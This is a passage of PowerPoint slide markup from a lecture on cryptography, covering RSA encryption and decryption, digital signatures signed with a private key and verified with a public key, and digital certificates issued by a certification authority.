              <a:t>between 1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and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that is relatively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prime to (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>a-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>1)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b-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0"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plaintext block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>P is encrypted as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i="1" baseline="30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i="1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mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1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Because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the exponentiation is performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>mod n, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>factoring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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="30000" dirty="0" err="1">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000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to uncover the encrypted plaintext is difficult.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However,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decryption key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d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>is carefully chosen so that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i="1" baseline="30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d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mod n = P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decryption key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>can be computed from the condition that                          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 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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1 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mod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a-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1)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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b-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1)))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>           (i.e.,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 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 mod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a-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1)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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b-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1))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Thus, the legitimate receiver who knows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>simply computes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 i="1" baseline="30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i="1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d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mod n = P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>and recovers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> without having to factor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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="30000" dirty="0" err="1">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000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062038" y="5441470"/>
            <a:ext cx="6546850" cy="1203385"/>
            <a:chOff x="1062038" y="5332413"/>
            <a:chExt cx="6546850" cy="1203385"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27652" name="矩形 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2438400" y="5368925"/>
              <a:ext cx="11604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i="1" baseline="0" dirty="0" err="1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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" baseline="30000" dirty="0" err="1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e</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="300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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1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mod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="3000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2000" i="1" baseline="0" dirty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n</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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53" name="矩形 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1458913" y="6135688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</a:t>
              </a:r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27654" name="群組 11"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1062038" y="5400675"/>
              <a:ext cx="1114425" cy="719138"/>
              <a:chOff x="1062325" y="5400748"/>
              <a:chExt cx="1114436" cy="719138"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27668" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1062325" y="5400748"/>
                <a:ext cx="1114436" cy="719138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669" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1069059" y="5409846"/>
                <a:ext cx="106007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7655" name="群組 15"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3727450" y="5368925"/>
              <a:ext cx="1114425" cy="777875"/>
              <a:chOff x="3726820" y="5368545"/>
              <a:chExt cx="1114436" cy="778950"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27666" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3726820" y="5368545"/>
                <a:ext cx="1114436" cy="778950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667" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3781180" y="5378400"/>
                <a:ext cx="942287" cy="523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400" b="1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X?%^*&amp;%)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" baseline="0" dirty="0" err="1">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                  </a:rPr>
                  <a:t>I,gS</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1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#!@ ...</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1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7656" name="群組 12"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6494463" y="5346700"/>
              <a:ext cx="1114425" cy="719138"/>
              <a:chOff x="1062325" y="5400748"/>
              <a:chExt cx="1114436" cy="719138"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27664" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1062325" y="5400748"/>
                <a:ext cx="1114436" cy="719138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7665" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1069059" y="5409846"/>
                <a:ext cx="106007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 dirty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 dirty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7657" name="向右箭號 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2438400" y="5768975"/>
              <a:ext cx="1117600" cy="107950"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50183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58" name="向右箭號 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4997450" y="5732463"/>
              <a:ext cx="1403350" cy="107950"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50194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59" name="矩形 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4997450" y="5332413"/>
              <a:ext cx="14827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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" baseline="3000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e</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i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)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" baseline="3000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d </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i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mod n </a:t>
              </a:r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0" name="矩形 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6970713" y="6032500"/>
              <a:ext cx="32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P</a:t>
              </a:r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1" name="矩形 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4076700" y="6135688"/>
              <a:ext cx="320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C</a:t>
              </a:r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2" name="矩形 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2509838" y="5768975"/>
              <a:ext cx="1049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key:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1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 e</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" i="1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7663" name="矩形 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5167313" y="5759450"/>
              <a:ext cx="1047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key:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" baseline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 d</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" i="1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5224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ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Encryption and Decryption</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000" b="1">
              <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
            </a:endParaRPr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E878DBF-892E-4626-95A6-1B126B1F3B4F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28676" name="Picture 2" descr="Encryption / Decry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187450"/>
            <a:ext cx="74803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204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91550" y="6386513"/>
            <a:ext cx="466725" cy="387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7566CEA-F1F8-4FD5-8321-83418B2CE985}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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77788"/>
            <a:ext cx="8774112" cy="668337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="44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Digital Signatures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904875"/>
            <a:ext cx="8545512" cy="4030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A digital signature is an example of using encryption techniques to provide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authentication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services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> in e-commerce applications.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b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>digital signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> is a means of associating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 mark unique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>to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an individual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>with 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body of text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Other persons should be able to check that the signature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does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> come from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originator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digital signature</a:t>
            </a:r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 consists of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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a string of symbols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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different for each use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>achieved by making each digital signature a function of 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message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> that it is signing, together with a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time stamp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To be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unique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to each signer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>and 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counterfeitproof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>: achieved by making each digital signature dependent on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some secret number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>that is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unique to the signer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Public key techniques are the means creating digital signatures.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28713" y="5046663"/>
            <a:ext cx="7462837" cy="1370012"/>
            <a:chOff x="1128713" y="5046663"/>
            <a:chExt cx="7462837" cy="1370012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29701" name="群組 6"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1241425" y="5046663"/>
              <a:ext cx="1114425" cy="719137"/>
              <a:chOff x="804933" y="5924550"/>
              <a:chExt cx="1114425" cy="719139"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29715" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="804933" y="5924550"/>
                <a:ext cx="1114425" cy="719139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9716" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="811667" y="5933648"/>
                <a:ext cx="106006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9702" name="文字方塊 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2644775" y="5072063"/>
              <a:ext cx="1055688" cy="68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200" b="1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A secret number of</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1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the signer</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline="0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29703" name="直線單箭頭接點 11"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2497138" y="5768975"/>
              <a:ext cx="1331912" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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4" name="文字方塊 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1574800" y="5678488"/>
              <a:ext cx="4095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+</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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05" name="矩形 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1128713" y="6016625"/>
              <a:ext cx="1400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0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time stamp</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" b="1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06" name="矩形 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3883025" y="5106988"/>
              <a:ext cx="150495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1" baseline="0" dirty="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digital signature </a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="1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07" name="文字方塊 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2387600" y="5854700"/>
              <a:ext cx="23796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4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(use A’s private key to sign)</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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08" name="向右箭號 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5289550" y="5557838"/>
              <a:ext cx="817563" cy="222250"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 49950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09" name="文字方塊 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5148263" y="5765800"/>
              <a:ext cx="4714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A</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="24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9710" name="文字方塊 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5934075" y="5738813"/>
              <a:ext cx="4714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1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B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="1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29711" name="群組 6"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6429375" y="5133975"/>
              <a:ext cx="1114425" cy="719138"/>
              <a:chOff x="804933" y="5924550"/>
              <a:chExt cx="1114425" cy="719139"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29713" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="804933" y="5924550"/>
                <a:ext cx="1114425" cy="719139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29714" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="811667" y="5933648"/>
                <a:ext cx="106006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200" b="1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The resulting data has to  be cleaned …</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200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29712" name="文字方塊 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6175375" y="5889625"/>
              <a:ext cx="24161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400" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="FF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rPr>
                <a:t>(use A’s public key to verify)</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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92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Digital Signatures</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="40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072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C7B9BE-4BC8-40F5-A8D6-AEC5B200D493}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30724" name="Picture 2" descr="http://www.infosec.gov.hk/english/itpro/images/digital_signa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296988"/>
            <a:ext cx="715645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494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r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Digital Certificates</a:t>
            </a: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>
          <a:xfrm>
            <a:off x="284163" y="806450"/>
            <a:ext cx="8774112" cy="1717675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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>digital certificate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>is used to combine the value of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a public key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>with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the identity of the person or service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>that holds the corresponding private key into a digitally signed statement.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Certificates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> are issued and signed by a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certification authority </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>(CA).</a:t>
            </a:r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E44DCDF-E6E6-4738-A3BD-75CFDCDC97EA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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686050"/>
            <a:ext cx="1219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6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="566738" y="3375025"/>
            <a:ext cx="1724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TW" sz="2400" baseline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certification authority </a:t>
            </a:r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51" name="向右箭號 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2101969">
            <a:off x="2339975" y="3638550"/>
            <a:ext cx="727075" cy="403225"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49962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52" name="文字方塊 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
